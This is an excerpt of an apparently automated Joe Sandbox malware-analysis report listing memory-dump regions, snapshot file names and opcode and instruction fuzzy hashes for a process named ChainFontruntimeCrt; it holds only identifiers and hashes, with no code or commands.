                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: _H
                                                                                                                        • API String ID: 0-1721965084
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 0-3916222277
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 0-3916222277
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 0-3916222277
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 96240cdb86f0705c04cff81148de5e5f87921c00ba5b38eaf5ae19fee9f07a43
                                                                                                                        • Instruction ID: 63cead827c398f5b2631de217536dc3513971fb60533aac3062b8116eeed1468
                                                                                                                        • Opcode Fuzzy Hash: 96240cdb86f0705c04cff81148de5e5f87921c00ba5b38eaf5ae19fee9f07a43
                                                                                                                        • Instruction Fuzzy Hash: EE329430B19A1D8FDBA8DB58C8A5A7973E2FF54315B1141B9D00EC72F2DA34AD45CB82
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 383be6980c5b9a478c7dcb2b1b764011489e075bc1e694e53156e597b7ca5649
                                                                                                                        • Instruction ID: 948c3d45703e4aa1eecccf583deda002c6257d6ba944c4a77a320d41d6f20510
                                                                                                                        • Opcode Fuzzy Hash: 383be6980c5b9a478c7dcb2b1b764011489e075bc1e694e53156e597b7ca5649
                                                                                                                        • Instruction Fuzzy Hash: E4F1E530A195498FEB99CF54C0E06B537A1FF49304F5545BDD84ACB2EADA38F981CB82
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d967355b2ad3dae926212cd9d4ff17dfcaf18e19a2e1229c2d36f85fe3964e7d
                                                                                                                        • Instruction ID: f6829d45290af128017ba0597d035ad78e44de7520f6c0952d8be175d788eba4
                                                                                                                        • Opcode Fuzzy Hash: d967355b2ad3dae926212cd9d4ff17dfcaf18e19a2e1229c2d36f85fe3964e7d
                                                                                                                        • Instruction Fuzzy Hash: B1D1F330A0EA0E8FD378DB58D4A467577E5FF45308B11457DC44B876F2DB29B9428B82
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 84b8034d0798b65257f65970eee9332788fdfc19626ee670d49c0ba15a904c24
                                                                                                                        • Instruction ID: d126421081af3569e8695712d967c5619b8fb3ca3812141c62dc5e9f3c430210
                                                                                                                        • Opcode Fuzzy Hash: 84b8034d0798b65257f65970eee9332788fdfc19626ee670d49c0ba15a904c24
                                                                                                                        • Instruction Fuzzy Hash: 41D1F230A1EB4A8FE378CB58D4A157577E1FF44308B11457EC08E876F6DB29B9428782
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 963bb2a0019d0017c6b920c8ec07974f264bbd3f82fd905b91b8cfa99b9f350b
                                                                                                                        • Instruction ID: 882ac1b638f07b46c0af6914582e2706aa73e2cd4ac76fb5d7c2cc32612470c7
                                                                                                                        • Opcode Fuzzy Hash: 963bb2a0019d0017c6b920c8ec07974f264bbd3f82fd905b91b8cfa99b9f350b
                                                                                                                        • Instruction Fuzzy Hash: AFC1D2306196468BEB29CF48C0E81B937A1FF45304B5545BDC89F8B6EBD738E545CB82
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0a324ccbc9cf2cb6eeec79cb5549cfc9ffd89a1f0f9dddc90e15f7156bd55cd5
                                                                                                                        • Instruction ID: 8a59f0e9ad741d18e905d4b0a5aaed824c8117702c82d7f49dd25be43af1c0ab
                                                                                                                        • Opcode Fuzzy Hash: 0a324ccbc9cf2cb6eeec79cb5549cfc9ffd89a1f0f9dddc90e15f7156bd55cd5
                                                                                                                        • Instruction Fuzzy Hash: 1EC1D130A1954A8BEB69CF44C0E05B537A1FF49304F5545BDD84B8B6EBDA38F981CB82
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4ec5568f58173124ce74962761ab87dd2b6d204dafd7bcf098659caaed00eea1
                                                                                                                        • Instruction ID: 1e1dea7c580726cb476717b21719a92319138473d144f4936e80d7741d1e45e4
                                                                                                                        • Opcode Fuzzy Hash: 4ec5568f58173124ce74962761ab87dd2b6d204dafd7bcf098659caaed00eea1
                                                                                                                        • Instruction Fuzzy Hash: DFA10530A1DA4A8FE759DB68C0A06A4B7A0FF45304F4545B9C44EC7BE6CBA8F951CBC1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1e7ff0574c914629406ff84a7fcea10b73644b086dd783cebdb826b3384beba3
                                                                                                                        • Instruction ID: a970d33cb56c5e754f67feffb389901837d2c9aa29b6a55cae664c459824fbd5
                                                                                                                        • Opcode Fuzzy Hash: 1e7ff0574c914629406ff84a7fcea10b73644b086dd783cebdb826b3384beba3
                                                                                                                        • Instruction Fuzzy Hash: 42119D52F0F18E8AF73952A418B10BCB9407F90318F5B05BAD64E861F6DE4C6A4462C3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1cb7e2a675c8bbd18aa5f9c4d54b05cdce64a2bd33d3c85d2593828f9d86f461
                                                                                                                        • Instruction ID: d4fc1672d3a8f2c84f0dfa5081802faacd57e6c2cee9154ee6e184d7b0f80ad7
                                                                                                                        • Opcode Fuzzy Hash: 1cb7e2a675c8bbd18aa5f9c4d54b05cdce64a2bd33d3c85d2593828f9d86f461
                                                                                                                        • Instruction Fuzzy Hash: 0DA1163060DE8A8FD759DB68D8A06A4B7A0FF15304F4541BDC44EC7AE6CB28B951C7D2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2be44939296f5daf7d41e0778775ffde1bf35ac5b35f93bd2573fe60333f4b67
                                                                                                                        • Instruction ID: 5d3d976be649ade07be62408bf541b3804d3c9f0aab8ed3352a2bd447dc41aa0
                                                                                                                        • Opcode Fuzzy Hash: 2be44939296f5daf7d41e0778775ffde1bf35ac5b35f93bd2573fe60333f4b67
                                                                                                                        • Instruction Fuzzy Hash: 72A10630A195598FEB68CF18C0A06B877A1FF54314F5541FDC44ECB5EADA38E981CB82
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5a5b5b943f8a09a15325ee3a67212606b7f0c388ee3ffa9e841cfc50e2ff5c9d
                                                                                                                        • Instruction ID: 860b5d3f1b5b0c13bcb5936b39a4a6d82e6b22af81f50b19f90ceeb5077bf6ac
                                                                                                                        • Opcode Fuzzy Hash: 5a5b5b943f8a09a15325ee3a67212606b7f0c388ee3ffa9e841cfc50e2ff5c9d
                                                                                                                        • Instruction Fuzzy Hash: 5D812631B0EA4A4FE7399A58946517977E0FF81314B16057EE48F832F3DE29B9028783
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8d0b29cb1ddbfc91b9fe8af9d9db6c841708b84064fe70526d26202ea95e1f41
                                                                                                                        • Instruction ID: 59f5e45f05f06556266b12dece93535925ba0bbde0423ac89298f1bdf3c640aa
                                                                                                                        • Opcode Fuzzy Hash: 8d0b29cb1ddbfc91b9fe8af9d9db6c841708b84064fe70526d26202ea95e1f41
                                                                                                                        • Instruction Fuzzy Hash: 4C811431B1EE4A4FE7788A58A86157577E0FF45318B16007EE48EC31F2DE29B9028783
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a037c4993f0e40f93e67e22a450011559c320bd73f3956aef3e3a47fda68f9be
                                                                                                                        • Instruction ID: 55edb3a1673a1ac66cae0a51bd7e79e148c9bd08b91596736e1e1b67184d7e82
                                                                                                                        • Opcode Fuzzy Hash: a037c4993f0e40f93e67e22a450011559c320bd73f3956aef3e3a47fda68f9be
                                                                                                                        • Instruction Fuzzy Hash: 48813631B0EA4A4FE3789A9894615B577E0FF45314B16057EE48EC72F3CA69B90287C3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 51e185b5a3bad2b0dedb030a7c063c73657bed3c85961752dccc06712ae958f9
                                                                                                                        • Instruction ID: 8d74694331028cec11e51a04a6c3173d8440c317f1bff00339030fc008efd846
                                                                                                                        • Opcode Fuzzy Hash: 51e185b5a3bad2b0dedb030a7c063c73657bed3c85961752dccc06712ae958f9
                                                                                                                        • Instruction Fuzzy Hash: 1F711431A0E54D4FE778DA58C8665B933D0FF48314B2602B9D49FC75F2DE18AA0687C2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bbb38a4d3d9417e42ed5d21c7cc31df98210a3892e0ea4c901b7fa338081635e
                                                                                                                        • Instruction ID: 0f93b17e667208782afd32e2168abe366337966006a5716f08f8609d9da4a2d2
                                                                                                                        • Opcode Fuzzy Hash: bbb38a4d3d9417e42ed5d21c7cc31df98210a3892e0ea4c901b7fa338081635e
                                                                                                                        • Instruction Fuzzy Hash: 5F711571A0E94D4FE778DA5888665B937C0FF44315B1202B9E49FC75F2DE28AA0687C3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        • Instruction Fuzzy Hash: 7331733160C9498FDF98EF18C0A5EA5B3E1FBA931071505ADD04EC72A2DE35F985CB82
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0cbefaed816f70f64ccc57429d81c05e8276ad6584bedf4ebb85fa772ed5050b
                                                                                                                        • Instruction ID: 8bee5c382e7b54df771b3084901e44a5316a30af5a621c5e79b40475960e7881
                                                                                                                        • Opcode Fuzzy Hash: 0cbefaed816f70f64ccc57429d81c05e8276ad6584bedf4ebb85fa772ed5050b
                                                                                                                        • Instruction Fuzzy Hash: A8311E30A0E54ECFDBA8DB9484A16BE77B5FF45304F52017AD41FE21F1DA396A409782
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 81e4c08662308f98d53e6ff12632ce144bbc781b71c1711829c5d8ba4dd8e2a4
                                                                                                                        • Instruction ID: 4171cd43f0488be83faa3401b4ac8b8d4a3bcd0f3a51407e447cfcd329947a10
                                                                                                                        • Opcode Fuzzy Hash: 81e4c08662308f98d53e6ff12632ce144bbc781b71c1711829c5d8ba4dd8e2a4
                                                                                                                        • Instruction Fuzzy Hash: 6C319530A0965E8FDB45EB78C8649B97BF1FF5A300B0606FAD049D71B2DB38A945CB50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 57166e3fa2355816418839c36a5a0d5e295bf6ee20a5fee0a187a398be159c13
                                                                                                                        • Instruction ID: 384f0d3ffb84db42af931628334cf723250af44ebb4b5592bc274d00251bab54
                                                                                                                        • Opcode Fuzzy Hash: 57166e3fa2355816418839c36a5a0d5e295bf6ee20a5fee0a187a398be159c13
                                                                                                                        • Instruction Fuzzy Hash: AC311C30A1954ECFEB78DB9484656BE77B1FF44308F5200B6D00EE21F1DA386A509B82
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8e865e52e4b6363cb34665c2d4fa7ddc49fe31f44bd74109320efa77c1e1ac5d
                                                                                                                        • Instruction ID: 3dd6638c2df5db6e91f9315dbc229fdcbfe8fdafc27d5c1c19dd94a87f751317
                                                                                                                        • Opcode Fuzzy Hash: 8e865e52e4b6363cb34665c2d4fa7ddc49fe31f44bd74109320efa77c1e1ac5d
                                                                                                                        • Instruction Fuzzy Hash: FC21B131A0E6CD9FDB569BA488309A87FB1FF56300B1A01EBD049CB1F3DA295909C742
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 75fe22dc34c4b17d7fd10f8ae470851e795fed85a2876bb6cec43570fe017fa0
                                                                                                                        • Instruction ID: 4276555a490dae364267409cb6f11513df1c615f1371e1428b0e02085e051e87
                                                                                                                        • Opcode Fuzzy Hash: 75fe22dc34c4b17d7fd10f8ae470851e795fed85a2876bb6cec43570fe017fa0
                                                                                                                        • Instruction Fuzzy Hash: FC318171E1E68D8FDB55DBA4C8605EDBBB1FF59300F0500BAD00AE72E2DE286945C752
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fae47677a8be990c09a22bc78820b039cd4a73f1cfc73b461acc3c5970fc5bba
                                                                                                                        • Instruction ID: bcfa051b48fd2a0590b847e7e81c6d391215a1218accba377efe23ead892a392
                                                                                                                        • Opcode Fuzzy Hash: fae47677a8be990c09a22bc78820b039cd4a73f1cfc73b461acc3c5970fc5bba
                                                                                                                        • Instruction Fuzzy Hash: D821FC72B0954E4BEB68EBB894366ECB3D1FF54314F150279D05DC32E2EE18690143C1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1760148325.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9b7d0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 822f7d4e6fb872e9ee633864c31bac9aa0bd902fafb2f52a85d8c9d0433f204b
                                                                                                                        • Instruction ID: e0a06f7ed7bb7bb9ff31260c9993333d301b97468ba0a88da64bbf7e58460b98
                                                                                                                        • Opcode Fuzzy Hash: 822f7d4e6fb872e9ee633864c31bac9aa0bd902fafb2f52a85d8c9d0433f204b
                                                                                                                        • Instruction Fuzzy Hash: 77210A20B19E1D0FE758E76C94AA676B6C6EBDC351F4102BDE40DC32F6DD28AC418281
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a9f2233ca1473cabede032cf34c88b07f9c9982b8876a65f4794f94cd012bc00
                                                                                                                        • Instruction ID: 60d5418d413155e972c22cab54c5962250a91a38e3bb1e805bc0e8f0492214ef
                                                                                                                        • Opcode Fuzzy Hash: a9f2233ca1473cabede032cf34c88b07f9c9982b8876a65f4794f94cd012bc00
                                                                                                                        • Instruction Fuzzy Hash: F0316D71B1990A8BDB58DF98D5A19A8F3A2FF58310B154179D41EC72A2CF34BD12CBC1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 70dad5e1fa46c1b798a8c6912683f869839bef20d8176bcb903711247ad10f47
                                                                                                                        • Instruction ID: 2fe477641245a6f5f1b9350f88cb2ed5da75765bb562f0ecd8ce727e7ffe343b
                                                                                                                        • Opcode Fuzzy Hash: 70dad5e1fa46c1b798a8c6912683f869839bef20d8176bcb903711247ad10f47
                                                                                                                        • Instruction Fuzzy Hash: 43210B71B0DA4E4FDB68EBA894722E8B7D1FF54314F450179D05DC32E6DE28690187C1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 65299caf03c371e88828105dc575946833d2cbee1eb96782c5c9e352fafec57a
                                                                                                                        • Instruction ID: 9f190e47e1325ccf9cb35cc77e7f67ec16eee84df100dc4621a2ee70b82dac64
                                                                                                                        • Opcode Fuzzy Hash: 65299caf03c371e88828105dc575946833d2cbee1eb96782c5c9e352fafec57a
                                                                                                                        • Instruction Fuzzy Hash: E131F810A1E5DA4EE739825444705797B91FF9630471A46FEC09E8B4F7C92CA98297C3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c2c945eb0c2630238fa81bc7ef8daaf5b55042e88983f9c555a55d3645e17a56
                                                                                                                        • Instruction ID: 5d5c281190c5d1fdf96ede6704da76b7e3c6131e88424aa76ff27c1ab0cb92e0
                                                                                                                        • Opcode Fuzzy Hash: c2c945eb0c2630238fa81bc7ef8daaf5b55042e88983f9c555a55d3645e17a56
                                                                                                                        • Instruction Fuzzy Hash: EB313A1061D59A8EE73A829848785B87B51FF4630471945BBD0DFCB1F7E63CEA4983C2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0be2b9b38af9c879604f41159acc89a1b4d217c1efd241dbbacf9e1fa06de2a8
                                                                                                                        • Instruction ID: 91859cfccb0303c20f98d6c80ef9659404f3a7a09a07666971be26affda0e9fb
                                                                                                                        • Opcode Fuzzy Hash: 0be2b9b38af9c879604f41159acc89a1b4d217c1efd241dbbacf9e1fa06de2a8
                                                                                                                        • Instruction Fuzzy Hash: EE318E10E1D59A4BE379831484705747B91FF96304F1A46B6C096CB0FFD42CF58187C2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1763082572.00007FFD9BBE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBE0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_7ffd9bbe0000_ChainFontruntimeCrt.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ca885bd41365281ada984f0d653f97436f12d6986dc24ab4edb639d94c4cb0b4
